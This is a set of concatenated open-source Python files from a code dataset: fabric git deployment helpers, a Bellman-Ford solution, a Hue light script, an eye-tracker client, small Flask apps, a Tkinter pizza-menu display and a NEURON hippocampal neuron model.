HOW FABDEPLOIT IS INTENDED TO BE USED\n if commit is None or commit == release_deployment_branch:\n head_rev = fab.run('git rev-parse HEAD')\n # not done here, but should look like this\n #fab.run('git fetch \"%s\"' % update_to_remote)\n # switch to headless or make sure we are in headless mode\n fab.run('git checkout \"%s\"' % head_rev)\n # update branch pointer\n fab.run('git update-ref \"refs/heads/%s\" \"refs/remotes/%s/%s\"' % (\n release_deployment_branch,\n update_to_remote,\n release_deployment_branch,\n ))\n # switch to updated branch\n fab.run('git checkout \"%s\"' % release_deployment_branch)\n else:\n # Using the branch should only be done in some obscure edge cases\n # as after we switched to a branch instead of headless checkout\n # the first \"git --reset\" above will apply all file changes. This\n # is not the indented behavior. As of this for the most cases we\n # use the release commit sha1 whenever possible. See above.\n fab.run('git checkout \"%s\"' % (commit if commit else release_deployment_branch))\n # make sure everything is clean\n fab.run('git reset --hard')\n\n\n# BACKWARDS COMPATIBILITY\n\n\ndef _legacy_git(git_class=Git):\n warnings.warn('You are using the legacy function, please switch to class based version', PendingDeprecationWarning)\n\n fab.require('deploy_git_repository', 'deploy_release_branch', 'deploy_remote_git_repository')\n return git_class(\n local_repository_path=fab.env.deploy_git_repository,\n remote_repository_path=fab.env.deploy_remote_git_repository,\n release_branch=fab.env.deploy_release_branch,\n release_author=fab.env.get('deploy_release_author', None),\n )\n\n\ndef create_release(release_commit_filter=None):\n if release_commit_filter and callable(release_commit_filter):\n class FilteredGit(Git):\n def filter_release_commit(self):\n release_commit_filter(self.release_commit)\n git = _legacy_git(FilteredGit)\n else:\n git = _legacy_git()\n\n return git.release(\n message=fab.env.get('deploy_release_message', None),\n tag_name=fab.env.get('deploy_release_tag', None),\n merge_back=fab.env.get('deploy_merge_release_back', False),\n )\n\n\npull_origin = legacy_wrap(_legacy_git, 'pull_origin')\npush_release = legacy_wrap(_legacy_git, 'push_release')\npush_origin = legacy_wrap(_legacy_git, 'push_origin')\nswitch_release = legacy_wrap(_legacy_git, 'switch_release')\n\n\ndef _git_write_object(repo, obj):\n warnings.warn('Function was renamed to _git_raw_write_object()', PendingDeprecationWarning)\n\n return _git_raw_write_object(repo, obj)\n","repo_name":"team23/fabdeploit","sub_path":"fabdeploit/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":21898,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"18567795696","text":"from collections import defaultdict\nimport sys\ninput = sys.stdin.readline\nINF = sys.maxsize\n\ndef BF():\n D = [INF] * (N + 1)\n D[1] = 0\n for i in range(N):\n for n1 in range(1, N+1):\n if n1 == INF:\n continue\n for t, n2 in G[n1]:\n if D[n2] > t + D[n1]:\n D[n2] = t + D[n1]\n if i == (N-1):\n return True\n return False\n\nTC = int(input())\nfor _ in range(TC):\n N, M, W = map(int, input().split())\n G = defaultdict(list)\n for _ in range(M):\n S, E, T = map(int, input().split())\n G[S].append((T, E))\n G[E].append((T, S))\n for _ in range(W):\n S, E, T = map(int, input().split())\n G[S].append((-T, E))\n\n if BF():\n print('YES')\n else:\n print('NO')\n\n# 시작점이 어디든 음수 사이클만 존재하는 것을 확인하면 YES...","repo_name":"seunghee73/may-algo-study","sub_path":"0511/1865_hee.py","file_name":"1865_hee.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73876595608","text":"import json\nimport requests\nfrom random import randrange\nimport time\n\n\nurl = \"http://192.168.0.103/api/glybzbW9HU7WbJqfj8yvM5oT66RiUTriPGh4X0A5/lights/1/state\"\n\nhue = 2000\non = True\n\nwhile True:\n time.sleep(0.001)\n if hue < 60000:\n hue = hue+200\n data_on = {\"on\": True, \"sat\":254,\"bri\":254, \"hue\":hue}\n r = requests.put(url, json.dumps(data_on), timeout=5)\n print(\"Hue Color: \", hue, \"/60000\")\n \n else:\n hue = 1\n data_on = {\"on\": True, \"sat\":254,\"bri\":254, \"hue\":hue}\n r = requests.put(url, json.dumps(data_on), timeout=5)\n print(\"Restart\")\n\n","repo_name":"jonthieboii/hueLight","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5781136247","text":"from PySide import QtCore, QtNetwork\nimport json\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\n# attributes we can get/set on the tracker, except for 'frame'\ntrackerAttributes = ['push', 'heartbeatinterval', 'version', 'trackerstate',\n 'framerate', 'iscalibrated', 'iscalibrating', 'calibresult',\n 'screenindex', 'screenresw', 'screenresh',\n 'screenpsyw', 'screenpsyh']\n\nclass EyeTribe(QtCore.QObject):\n \"\"\"\n EyeTribe client for PySide\n \"\"\"\n newFrame = QtCore.Signal(dict)\n\n # State masks\n STATE_TRACKING_GAZE = 0x1\n STATE_TRACKING_EYES = 0x2\n STATE_TRACKING_PRESENCE = 0x4\n STATE_TRACKING_FAIL = 0x8\n STATE_TRACKING_LOST = 0x10\n\n def __init__(self):\n \"\"\"\n Connect to tracker and get all attribute values\n \"\"\"\n super().__init__()\n self.socket = QtNetwork.QTcpSocket(self)\n self.socket.readyRead.connect(self.handleReadyRead)\n self.socket.stateChanged.connect(lambda state: logger.info('Tracker socket: {}'.format(state)))\n\n self._inBuffer = QtCore.QByteArray()\n self._inBraceCounter = 0\n self._inBraceFlag = False\n\n self._trackerAttributes = {}\n for attr in trackerAttributes:\n self._trackerAttributes[attr] = None\n\n self._heartbeatTimer = QtCore.QTimer(self)\n self._heartbeatTimer.timeout.connect(self.sendHeartbeat)\n\n\n def start(self, ip='127.0.0.1', port=6555):\n self.socket.connectToHost(ip, port)\n self._heartbeatTimer.start(1000)\n\n # Send initial requests: set push and get all attributes\n self.set({\"push\": True, \"version\": 1})\n self.requestGet(trackerAttributes)\n\n def stop(self):\n self._heartbeatTimer.stop()\n self.socket.disconnectFromHost()\n\n def sendMessage(self, category, request=None, values=None):\n msg = {'category': category}\n if request is not None:\n msg['request'] = request\n if values is not None:\n msg['values'] = values\n\n# logger.debug('Request: {}'.format(msg))\n json.dump(msg, self.socket)\n\n def sendHeartbeat(self):\n self.sendMessage('heartbeat')\n\n def handleReadyRead(self):\n \"\"\"\n Read from the socket, one byte at a time, until a valid JSON object is found.\n \n We judge the end of the JSON object by counting braces. For simplicity assume EyeTribe\n sends no braces within strings.\n \"\"\"\n while self.socket.bytesAvailable():\n c = self.socket.read(1)\n self._inBuffer.append(c)\n if c == '{':\n self._inBraceCounter += 1\n self._inBraceFlag = True\n elif c == '}':\n self._inBraceCounter -= 1\n if self._inBraceCounter < 0:\n raise Exception('Bad response received: too many closing braces')\n if self._inBraceFlag and self._inBraceCounter == 0:\n # A complete response!\n self._inBraceFlag = False\n self.handleResponse(json.loads(str(self._inBuffer)))\n self._inBuffer.clear()\n\n def get(self, attr):\n \"\"\"\n Get the latest value of a tracker attribute\n \"\"\"\n return self._trackerAttributes[attr]\n\n def requestGet(self, attr):\n \"\"\"\n Send a new request for tracker attributes\n \"\"\"\n if not isinstance(attr, list):\n attr = [attr]\n self.sendMessage('tracker', 'get', attr)\n\n def set(self, attr, value=None):\n \"\"\"\n Set the value of a tracker attribute via a new request\n If attr is a dict of name:value pairs, set all of them.\n \"\"\"\n if value is not None:\n attr = {attr: value}\n\n for name, value in attr.items():\n self._trackerAttributes[name] = value\n self.sendMessage('tracker', 'set', attr)\n\n def handleResponse(self, resp):\n \"\"\"\n Take one complete resp (one JSON object) and parse it,\n and emit a signal if needed\n \"\"\"\n logger.debug('Response: {}'.format(resp))\n\n if resp['statuscode'] == 200:\n if resp['category'] == 'tracker':\n if resp['request'] == 'get':\n for k, v in resp['values'].items():\n # assign tracker attributes to self\n self._trackerAttributes[k] = v\n if 'heartbeatinterval' in resp['values']:\n self._heartbeatTimer.setInterval(resp['values']['heartbeatinterval'])\n if 'frame' in resp['values']:\n self.handleFrame(resp['values']['frame'])\n elif resp['request'] == 'set':\n # All good - new values have already been set\n pass\n elif resp['category'] == 'calibration':\n pass\n elif resp['category'] == 'heartbeat':\n pass\n elif resp['statuscode'] == 800:\n # Calibration change\n self.sendMessage('tracker', 'get', ['iscalibrated', 'iscalibrating', 'calibresult'])\n elif resp['statuscode'] == 801:\n # Display change\n self.sendMessage('tracker', 'get', ['screenindex', 'screenresw', 'screenresh',\n 'screenpsyw', 'screenpsyh'])\n elif resp['statuscode'] == 802:\n # Tracker state change\n self.sendMessage('tracker', 'get', ['trackerstate'])\n else:\n # some error\n try:\n raise Exception('Tracker returned {}: {}'.format(resp['statuscode'], resp['values']['statusmessage']))\n except KeyError:\n raise Exception('Tracker returned {}'.format(resp['statuscode']))\n return None\n\n def handleFrame(self, frame):\n \"\"\"\n Handle a new received frame:\n Emit a signal with the latest frame object (a dict)\n \"\"\"\n self.newFrame.emit(frame)\n\nif __name__ == '__main__':\n from PySide.QtGui import QApplication\n import sys\n qt_app = QApplication(sys.argv)\n testClient = EyeTribe()\n qt_app.exec_()\n\n\n\n\n","repo_name":"leokoppel/gazecontour","sub_path":"gazecontour/eyetribe.py","file_name":"eyetribe.py","file_ext":"py","file_size_in_byte":6229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5502107760","text":"from flask import Flask, render_template, request, redirect, url_for\n\napp = Flask(__name__)\n\n# 가입한 사용자 정보를 저장할 리스트\nusers = []\n\n# 게시글 데이터를 저장할 리스트\nposts = []\n\n@app.route('/')\ndef index():\n return redirect('/register')\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'POST':\n id = request.form['id']\n password = request.form['password']\n age = request.form['age']\n location = request.form['location']\n email = request.form['email']\n\n # 회원 정보를 딕셔너리로 저장\n user = {\n 'id': id,\n 'password': password,\n 'age': age,\n 'location': location,\n 'email': email\n }\n\n # 회원 정보를 저장\n users.append(user)\n\n # 회원가입이 완료되면 success 페이지로 리디렉션\n return redirect('/success')\n\n return render_template('register.html')\n\n@app.route('/success')\ndef success():\n return render_template('success.html')\n\n@app.route('/posts', methods=['GET'])\ndef post_list():\n return render_template('post_list.html', posts=posts)\n\n@app.route('/posts/create', methods=['GET', 'POST'])\ndef create_post():\n if request.method == 'POST':\n title = request.form['title']\n content = request.form['content']\n post = {'title': title, 'content': content}\n posts.append(post)\n return redirect(url_for('post_list'))\n return render_template('create_post.html')\n\n@app.route('/posts/', methods=['GET'])\ndef view_post(post_id):\n if post_id < len(posts):\n post = posts[post_id]\n return render_template('view_post.html', post=post)\n return \"Post not found\"\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"NoskeLim/OSS_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13946518269","text":"from flask_restplus import fields, Resource\nfrom cluster.api.restplus import api\nfrom cluster.api.dbquery import all_for_marker, all_for_marker_dotplot\nns = api.namespace('marker')\n\n# marker table fields we are exposing as requestable values.\nmarker_fields = [\"sensitivity\", \"specificity\", \"accuracy\", \"precision\", \"recall\", \"t_stat\", \"z_stat\",\n \"log2_fold_change_vs_next\", \"log2_fold_change_vs_min\", \"mean_expression\"]\ndotplot_color_fields = marker_fields[5:]\ndotplot_size_fields = marker_fields[:5]\n\nmarker_values = fields.String(\n required=True,\n description=\"Values stored for a marker gene.\",\n enum=marker_fields\n)\n\ndotplot_color_values = fields.String(\n required=True,\n description=\"Values available for circle color in dotplot.\",\n enum=dotplot_color_fields\n)\n\ndotplot_size_values = fields.String(\n required=True,\n description=\"Values available for circle size in dotplot.\",\n enum=dotplot_size_fields\n)\n\ncluster_name = fields.String(required=True, description='Name of the cluster a circle represents.')\n\n\ncluster_dotplot_model = api.model(\"marker-dotplot-values\", {\n 'name': cluster_name,\n \"size\": fields.Float(description='Value represented as the size of the circle in a marker vis.'),\n \"color\": fields.Float(description='Value represented as the color of the circle in a marker vis.'),\n \"cell_count\": fields.Integer(description=\"Number of cells in the cluster.\")\n})\n\ndataset_model = api.model(\"dataset_model\", {\n \"name\": fields.String(required=True, description='Name of the dataset the cluster solution was computed on.'),\n \"species\": fields.String(required=True, description='None'),\n \"study\": fields.String(required=True, description='None'),\n \"organ\": fields.String(required=True, description='None'),\n})\ncluster_solutions_dotplot_model = api.model('marker-dotplot-clusters', {\n 'dataset': fields.Nested(dataset_model),\n 'cluster_solution_name': fields.String(required=True, description='Name of the cluster solution'),\n 'clusters': fields.List(fields.Nested(cluster_dotplot_model))\n})\n\nall_dotplot_model = api.model('marker-dotplot-cluster-solutions',{\n 'gene': fields.String(required=True, description='Name of the dataset the cluster solution was computed on.'),\n \"size_by\": dotplot_size_values,\n \"color_by\": dotplot_color_values,\n \"cluster_solutions\": fields.List(fields.Nested(cluster_solutions_dotplot_model))\n\n})\n\n###############################\n# Defined for the /marker//\ncluster_var_model = api.model('marker-values', {\n 'name': cluster_name,\n 'value': fields.Float(description='Value of a marker in a given cluster.'),\n }\n)\n\nmarker_model = api.model('marker-clusters', {\n 'dataset_name': fields.String(required=True, description='Name of the dataset the cluster solution was computed on.'),\n 'cluster_solution_name': fields.String(required=True, description='Name of the cluster solution'),\n 'clusters': fields.List(fields.Nested(cluster_var_model))\n})\n\nall_markers_model = api.model('marker-cluster-solutions',{\n 'gene': fields.String(required=True, description='Name of the dataset the cluster solution was computed on.'),\n \"variable\": fields.String(required=True, description='Name of variable requested for the markers.'),\n \"cluster_solutions\": fields.List(fields.Nested(marker_model))\n\n})\n#####################################\n\n@ns.route('//')\n@ns.param('name', 'Marker gene name, hugo or ensembl')\n@ns.param('variable', 'The variable type one of (X, X, X, X)')\nclass SingleMarkerVar(Resource):\n @api.marshal_with(all_markers_model, envelope=\"resource\")\n @ns.response(200, 'marker gene')\n def get(self, name, variable):\n \"\"\"A list of clustering solutions for a given marker and marker value.\"\"\"\n return all_for_marker(name, variable)\n\n\n@ns.route('//dotplot//')\n@ns.param('name', 'Marker gene name, hugo or ensembl')\n@ns.param('size', 'The variable to use as the size of circles')\n@ns.param('color', 'The variable to use for the color of circles')\nclass Marker(Resource):\n @api.marshal_with(all_dotplot_model, envelope=\"resource\")\n @ns.response(200, 'dotplot values for marker gene')\n def get(self, name, size, color):\n \"\"\"A list of dot plot ready clustering solutions for a given marker with a size and color variable.\"\"\"\n return all_for_marker_dotplot(name, size, color)","repo_name":"Stuartlab-UCSC/cluster-db","sub_path":"cluster/api/marker.py","file_name":"marker.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18510923628","text":"import tkinter as tk\nfrom libraries.utils.utils import capfirst\nfrom libraries.utils.languageHandler import LanguageHandler\nfrom libraries.utils.windowSpecs import WindowSpecs\nfrom libraries.cells.AbstractCell import Cell\nfrom libraries.cells.titleCell import TitleCell\nfrom libraries.cells.pizzaCell import PizzaCell\nfrom libraries.cells.aggiuntaCell import AggiuntaCell\nfrom libraries.cells.insalataCell import InsalataCell\nfrom libraries.cells.allergeniCell import AllergeniCell\nfrom libraries.cells.newColumn import NewColumnCell\nfrom libraries.cells.imageCell import ImageCell\nfrom libraries.cells.socialLogos import SocialLogos\nfrom libraries.cells.simpleTextCell import SimpleTextCell\nfrom libraries.cells.subtitlePriceCell import SubtitlePriceCell\nfrom libraries.resourceHandler import Recources\nimport json\nfrom PIL import ImageTk,Image \nimport os\nfrom abc import ABC\n\nclass PizzaMenu(ABC):\n\n _font_colors: dict\n _columnWidth: float\n\n allergens: dict\n\n resources: Recources\n\n def loadJsonData(self, fname):\n with open(fname) as f:\n return json.load(f)\n\n def connect2db(self, data):\n self.LHandler = LanguageHandler(data['languageSite'] + \"/\" + data['restaurantName'] + \".php\", data['defaultLanguage'], token=data['m_key'])\n\n def pizzeCreator(self, pizzaType=\"*\"): ### crea un dizionario con tutte le pizze e i suoi atributi\n \"\"\"\n creates a dictionary with all the pizzas that have the @pizzaType\n @pizzaType it's a list, or it can be \"*\" (default) for all elements\n \"\"\"\n pizze = []\n data = self.resources.get_pizzas(True)\n tipo_pizza = \"\"\n\n for i in data:\n if (i[\"nome_tipo\"] in pizzaType) or pizzaType == \"*\":\n if i[\"nome_tipo\"] != tipo_pizza:\n tipo_pizza = i[\"nome_tipo\"]\n pizze.append(TitleCell(self.window, i[\"nome_tipo\"], self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n pizzaAllergens = [self.allergens[x] for x in i[\"allergeni\"]] # filters the allergens to show only those that are in the pizza\n pizze.append(PizzaCell(self.window, i[\"nomePizza\"], self._font_colors[\"titolo\"], '€ {:,.2f}'.format(float(i[\"prezzo\"])), self._font_colors[\"price\"], {\"nome_italiano\" : capfirst(\", \".join(str(x) for x in i[\"ingredienti\"].split(\",\"))), \"nome_inglese\" : capfirst(\", \".join(str(x) for x in i[\"ingredientiInglese\"].split(\",\")))}, self._font_colors[\"generic_text\"], pizzaAllergens, [0, 0], self._columnWidth))\n \n return pizze\n\n def simpleTextCreator(self, text_list):\n \"\"\"\n creates a dictionary with all the simple text\n \"\"\"\n\n text = []\n\n for i in text_list:\n text.append(SimpleTextCell(self.window, i, self._font_colors[\"generic_text\"], 34, [0, 0], self._columnWidth))\n\n return text\n\n def newColumnCreator(self):\n return [NewColumnCell(self.window, [0, 0], self._columnWidth)]\n\n def menuSettimanaCreator(self):\n \"\"\"\n Creates menu della settimana\n \"\"\"\n menu_settimanale = self.resources.get_menu_settimanale()\n\n if len(menu_settimanale) == 0:\n return []\n \n widget_list = []\n widget_list.append(TitleCell(self.window, \"Menu pranzo\", self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n for i in menu_settimanale:\n widget_list.append(SubtitlePriceCell(self.window, i[\"day\"], self._font_colors[\"menu_settimanale\"], '€ {:,.2f}'.format(float(i[\"price\"])), self._font_colors[\"price\"], i[\"meal\"], self._font_colors[\"generic_text\"], [0, 0], self._columnWidth))\n\n return widget_list\n\n def aggiunteCreator(self):\n \"\"\"\n creates a dictionary with all the aggiunte\n \"\"\"\n aggiunteCell = []\n aggiunteCell.append(TitleCell(self.window, \"Aggiunte\", self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n aggiunte = self.resources.get_aggiunte()\n for i in aggiunte:\n aggiunteCell.append(AggiuntaCell(self.window, {\"nome_italiano\" : capfirst(i[\"nome_aggiunta\"]), \"nome_inglese\" : capfirst(i[\"nome_inglese\"])}, self._font_colors[\"generic_text\"], '€ {:,.2f}'.format(float(i[\"prezzo\"])), self._font_colors[\"price\"], [0, 0], self._columnWidth))\n\n return aggiunteCell\n\n def insalateCreator(self):\n \"\"\"\n creates a dictionary with all the \"insalate\"\n \"\"\"\n insalate = []\n data = self.resources.get_insalate(True)\n\n insalate.append(TitleCell(self.window, \"Insalate (+spianata)\", self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n for i in data:\n insalataAllergens = [self.allergens[x] for x in i[\"allergeni\"]] # filters the allergens to show only those that are in the pizza\n insalate.append(InsalataCell(self.window, i[\"nomeInsalata\"], self._font_colors[\"titolo\"], '€ {:,.2f}'.format(float(i[\"prezzo\"])), self._font_colors[\"price\"], {\"nome_italiano\" : capfirst(\", \".join(str(x) for x in i[\"ingredienti\"].split(\",\"))), \"nome_inglese\" : capfirst(\", \".join(str(x) for x in i[\"ingredientiInglese\"].split(\",\")))}, self._font_colors[\"generic_text\"], insalataAllergens, [0, 0], self._columnWidth))\n\n return insalate\n\n def allergeniCreator(self):\n allergens = self.loadAllergeni(scale=2)\n allergensList = []\n\n allergensList.append(TitleCell(self.window, \"Legenda allergeni\", self._font_colors[\"p_tipo\"], [0, 0], self._columnWidth))\n\n names, images = zip(*allergens.items())\n i = 0\n while (i < len(allergens)):\n if i+1 < len(allergens):\n allergensList.append(AllergeniCell(self.window, self._font_colors[\"generic_text\"], [0, 0], self._columnWidth, names[i], images[i], names[i+1], images[i+1]))\n else:\n allergensList.append(AllergeniCell(self.window, self._font_colors[\"generic_text\"], [0, 0], self._columnWidth, names[i], images[i]))\n \n i += 2\n\n return allergensList\n\n def logoCreator(self):\n targetFile = os.path.join(os.path.curdir, 'resources', 'images')\n image = Image.open(os.path.join(targetFile, \"Piccola-Italia-logo.png\"))\n return [ImageCell(self.window, image, [0, 0], self._columnWidth)]\n\n def loadSocialLogos(self):\n \"\"\"\n Loads all the social logos and returns a list with them\n \"\"\"\n targetFile = os.path.join(os.path.curdir, 'resources', 'social_logos')\n\n logos = []\n for image_name in os.listdir(targetFile):\n logos.append(Image.open(os.path.join(targetFile, image_name)))\n\n return [SocialLogos(self.window, logos, [0, 0], self._columnWidth)]\n\n def loadAllergeni(self, scale=1):\n \"\"\"\n Loads images of allergens\n @param scale is the scale of the images based on the default resolution\n \"\"\"\n targetFile = os.path.join(os.path.curdir, 'resources', \"allergeni\")\n resizeFormat = (self.windowSpecs.resolutionConverter(119/6*scale), self.windowSpecs.resolutionConverter(121/6*scale))\n\n uova = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"uova.png\")).resize(resizeFormat, Image.ANTIALIAS))\n pesce = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"pesce.png\")).resize(resizeFormat, Image.ANTIALIAS))\n noci = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"noci.png\")).resize(resizeFormat, Image.ANTIALIAS))\n soia = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"soia.png\")).resize(resizeFormat, Image.ANTIALIAS))\n glutine = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"glutine.png\")).resize(resizeFormat, Image.ANTIALIAS))\n latticini = ImageTk.PhotoImage(Image.open(os.path.join(targetFile, \"latticini.png\")).resize(resizeFormat, Image.ANTIALIAS))\n return { \"uova\" : uova, \"pesce\" : pesce, \"noci\" : noci, \"soia\" : soia, \"glutine\" : glutine, \"latticini\" : latticini }\n\n def setFontColors(self, colors) -> None:\n \"\"\"\n Sets the font colors\n \"\"\"\n self._font_colors = colors\n\n\n def tkWindowSetup(self):\n \"\"\"\n - Creates a window(Tk) and a @screenDimension[width, height] that contains the current screen dimension\n - Sets the screen to full screen and creates an attribute @fullScreebState that tracks the full screen state\n - It binds: F12 to quitFullScreen(); F11 to FullScreen(); Escape to close()\n - Hides cursor\n \"\"\"\n self.window = tk.Tk()\n self.window.attributes('-fullscreen', True) \n self.fullScreenState = False\n self.window.bind(\"\", self.quitFullScreen)\n self.window.bind(\"\", self.toggleFullScreen)\n self.window.bind(\"\", self.close)\n self.windowSpecs = WindowSpecs()\n self.screenDimension = self.windowSpecs.getScreenDimension()\n self.window.config(cursor=\"none\")\n \n def close(self, event):\n self.window.destroy()\n exit()\n\n def toggleFullScreen(self, event):\n self.fullScreenState = not self.fullScreenState\n self.window.attributes(\"-fullscreen\", self.fullScreenState)\n\n def quitFullScreen(self, event):\n self.fullScreenState = False\n self.window.attributes(\"-fullscreen\", self.fullScreenState)\n\n def show(self, menu):\n \"\"\"\n Shows all menu.\n NOTE : Must be call before update\n \"\"\"\n self.CACHEDMENU = menu\n if isinstance(menu, list):\n for i in menu:\n i.show()\n else:\n menu.show()\n\n def update(self):\n if isinstance(self.CACHEDMENU, list): # if there are more than 1 vertical grids\n for i in self.CACHEDMENU:\n i.updateCells()\n else:\n self.CACHEDMENU.updateCells()\n self.window.after(5000, self.update)\n","repo_name":"Norby99/MenuPizze","sub_path":"libraries/pizzaMenu.py","file_name":"pizzaMenu.py","file_ext":"py","file_size_in_byte":9872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1664551241","text":"import numpy as np\nimport neuron\nfrom neuron import h, gui, load_mechanisms\nfrom CA1_plasticity.model.utils import RecordingVector\nfrom CA1_plasticity.model.utils import Synapse\nimport sys\n\n\nclass CA1:\n\n def __init__(self, setting):\n self.setting = setting\n # h.nrn_load_dll('C:/Users/tomko/PycharmProjects/Neuron_CA1/Dist_tuft_LTP_CA1/mods/nrnmech.dll')\n load_mechanisms('./mods/')\n h.xopen('./hoc/morphology_ri06.nrn')\n h.xopen('./hoc/naceaxon.nrn')\n h.load_file('./hoc/resetNSeg.hoc')\n h.xopen('./hoc/init.hoc')\n h.load_file('./hoc/initializationAndRun.hoc')\n h.initchannels(0)\n\n self.soma = h.somaA\n self.distTuft = h.distTuft\n self.all_apicals = h.all_apicals\n self.all_basals = h.all_basals\n self.primary_apical_list = h.primary_apical_list\n\n self.v_vec = h.Vector().record(self.soma(0.5)._ref_v)\n self.t_vec = h.Vector().record(h._ref_t)\n self.t_rs_vec = h.Vector().record(h._ref_t, self.setting['simulation']['RECORDING_STEP'])\n self.dend_vecs = {}\n self.nmda_ica_vecs = {}\n self.ina_vecs = {}\n self.calH_ica_vecs = {}\n self.cai_vecs = {}\n self.ogb_vecs = {}\n self.pmp_vecs = {}\n self.spines_v_vecs = []\n\n self.stim = None\n self.bcm = None\n self.alpha_scout_vec = h.Vector()\n self.d_vec = h.Vector()\n self.p_vec = h.Vector()\n\n self.synapses = {}\n for dend in self.all_apicals:\n self.synapses[dend.hname()] = []\n for dend in self.all_basals:\n self.synapses[dend.hname()] = []\n self.syn_AMPA_count = 0\n self.syn_NMDA_count = 0\n self.net_cons = []\n self.net_stims = []\n self.rand_streams = []\n self.vec_stims = []\n self.apc_vec = h.Vector()\n\n self.ns_spon = []\n self.ns_terminals = []\n self.vecs = []\n\n self.spine_heads = []\n self.spine_necks = []\n\n self.stim_SEClamp = None\n self.iclamp_t_vec = None\n self.iclamp_amps_vec = None\n self.ppStim = h.ppStim\n\n def add_synapses_distTuf(self):\n neurite_area = 0\n neur_areas = h.Vector(h.numDistNeurites)\n neur_names = []\n sec_list_dist = []\n num_dist_neurites = 0\n for sec in self.distTuft:\n num_dist_neurites = num_dist_neurites + 1\n sec_list_dist.append(sec)\n for x in sec:\n neurite_area = neurite_area + x.area()\n neur_areas.x[num_dist_neurites - 1] = neurite_area\n neur_names.append(sec.hname())\n neurite_area = 0\n\n # DISTRIBUTE SYNAPSES\n dist_neur_sum = neur_areas.sum()\n norm_neur_areas = h.Vector()\n nnaInt = h.Vector()\n norm_neur_areas.copy(neur_areas)\n norm_neur_areas.div(dist_neur_sum)\n nnaInt.integral(norm_neur_areas)\n\n rand_gen = h.Random(self.setting['simulation']['SEED'])\n rand_gen.uniform(0, 1)\n rand_gen_anat = h.Random(self.setting['simulation']['SEED'] + 1e6)\n rand_gen_anat.uniform(0, 1)\n\n AMPA_gmax = self.setting['synapse']['AMPA_GMAX'] * self.setting['synapse']['SCALING_FACTOR']\n NMDA_gmax = self.setting['synapse']['NMDA_GMAX'] * self.setting['synapse']['SCALING_FACTOR']\n\n cur_syn = 0\n h('access somaA')\n h('distance()')\n for i in range(150):\n cur_rand = rand_gen.repick()\n while cur_rand > nnaInt.x[cur_syn]:\n cur_syn = cur_syn + 1\n\n h('access ' + neur_names[cur_syn])\n cur_syn = 0\n cur_rand_anat = rand_gen_anat.repick()\n cur_rand_anat_B = (int(cur_rand_anat * h.nseg) * 2 + 1) / (h.nseg * 2)\n\n syn_ampa = h.Exp2SynETDP_multNNb_precentred(cur_rand_anat_B)\n syn_ampa.tau1 = self.setting['synapse']['AMPA_TAU1']\n syn_ampa.tau2 = self.setting['synapse']['AMPA_TAU2']\n syn_ampa.e = self.setting['synapse']['AMPA_E']\n syn_ampa.start = self.setting['synapse']['AMPA_START']\n syn_ampa.dtau = self.setting['synapse']['AMPA_DTAU']\n syn_ampa.ptau = self.setting['synapse']['AMPA_PTAU']\n syn_ampa.d = self.setting['synapse']['AMPA_D0']\n syn_ampa.p = self.setting['synapse']['AMPA_P0']\n\n syn = Synapse(synapse=syn_ampa, synapse_id=i, section=h.secname(),\n segment_x=cur_rand_anat_B,\n distance=h.distance(cur_rand_anat_B), weight_vec=h.Vector(),\n init_weight=AMPA_gmax,\n input_spikes_vec=h.Vector(), receptor='AMPA', type='perforated',\n d_amp_vec=h.Vector(), p_amp_vec=h.Vector())\n\n self.synapses[h.secname()].append(syn)\n self.syn_AMPA_count = self.syn_AMPA_count + 1\n\n syn_nmda = h.Exp2SynNMDA_SLM(cur_rand_anat_B)\n syn_nmda.tau1 = self.setting['synapse']['NMDA_TAU1']\n syn_nmda.tau2 = self.setting['synapse']['NMDA_TAU1']\n syn_nmda.e = self.setting['synapse']['NMDA_E']\n\n syn = Synapse(synapse=syn_nmda, synapse_id=i, section=h.secname(),\n segment_x=cur_rand_anat_B,\n distance=h.distance(cur_rand_anat_B), weight_vec=h.Vector(),\n init_weight=NMDA_gmax,\n input_spikes_vec=h.Vector(), receptor='NMDA', type='perforated',\n d_amp_vec=h.Vector(), p_amp_vec=h.Vector())\n self.synapses[h.secname()].append(syn)\n self.syn_NMDA_count = self.syn_NMDA_count + 1\n\n h('access somaA')\n print('Total number of AMPA synapses: ' + str(self.syn_AMPA_count))\n print('Total number of NMDA synapses: ' + str(self.syn_NMDA_count))\n\n def print_dend_params(self, dend_name):\n h('access somaA')\n h('distance()')\n for dend in self.all_apicals:\n if dend.hname() == dend_name:\n print(dend.name(), dend.L, dend.nseg)\n print(dend.psection()['density_mechs'].keys())\n print('---------------------------------------------------')\n for seg in dend:\n xdist = h.distance(seg, sec=dend)\n print(seg, xdist, seg.diam, seg.cm, seg.g_pas, seg.gkabar_kad, seg.gkabar_kap, seg.gkdrbar_kdr,\n seg.gbar_nax, seg.gcalbar_calH)\n\n def insert_current_clamp(self, section, x):\n \"\"\"\n Inserts single pulse current clamp point process to a given section.\n\n Parmaters\n ---------\n section : 